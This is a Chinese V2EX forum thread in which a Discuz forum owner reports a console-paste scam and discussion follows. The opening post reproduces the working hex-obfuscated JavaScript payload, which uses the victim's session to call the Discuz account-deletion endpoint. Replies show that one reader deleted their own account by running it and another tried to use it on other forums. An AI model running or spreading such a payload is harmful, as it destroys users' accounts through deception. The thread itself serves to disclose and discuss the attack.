discuz 漏洞真 j8 多 有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了

2018-11-11 23:15:27 +08:00
 Event
这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码 你们自己看看

location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
9372 次点击
所在节点    信息安全
56 条回复
exceloo
2018-11-12 11:38:54 +08:00
这和 js 有半毛钱关系,只是诱导用户自己去删除帐号罢了。前端发的请求,js 都能模拟,用户自己作死去跑莫名其妙的代码你再牛逼也防不住啊。客户端执行的,又不是在服务端,还能咋办
simple11
2018-11-12 11:43:36 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
Event
2018-11-12 12:49:29 +08:00
@exceloo 可问题是为何会给用户删除自己账号的权限 而且没有什么防范
hero2040407
2018-11-12 12:50:18 +08:00
所以说删除用户这种操作需要一个提醒吧,点一下就直接删掉了?
exceloo
2018-11-12 13:10:47 +08:00
@Event hmmmm 这的确是个问题
coolloves
2018-11-12 13:19:52 +08:00
我擦,楼主好歹说下,运行的后果啊,我刚运行了下把我的账号给删掉了..................
onionnews
2018-11-12 15:44:47 +08:00
想利用这个代码删掉那些论坛账号的,但是我执行了不管用,跳转到 500 了。是程序版本问题?
kn007
2018-11-12 15:51:41 +08:00
好久前就见过了,DZ 一直没修复。
roryzh
2018-11-12 16:08:09 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
Jiaming
2018-11-13 09:00:23 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
roryzh
2018-11-13 17:16:15 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
Fakey2
2018-12-07 12:21:48 +08:00
这不是漏洞,这只是诱导类似钓鱼了,安全意识薄弱的人才会上当,根本也不是 DZ 本身的漏洞。。。我让你在 console 执行你就执行,这不是傻子行为么。。。所以跟 DZ 本身没关系。。。
xemtof
2019-01-09 18:59:34 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
771456556
2019-05-16 10:27:08 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
xmdhs
2020-02-26 22:17:41 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
binnerchen
2020-11-29 13:10:48 +08:00
所以你们到底嫌 JS 权限太大还是太小了??

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://tanronggui.xyz/t/506823

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX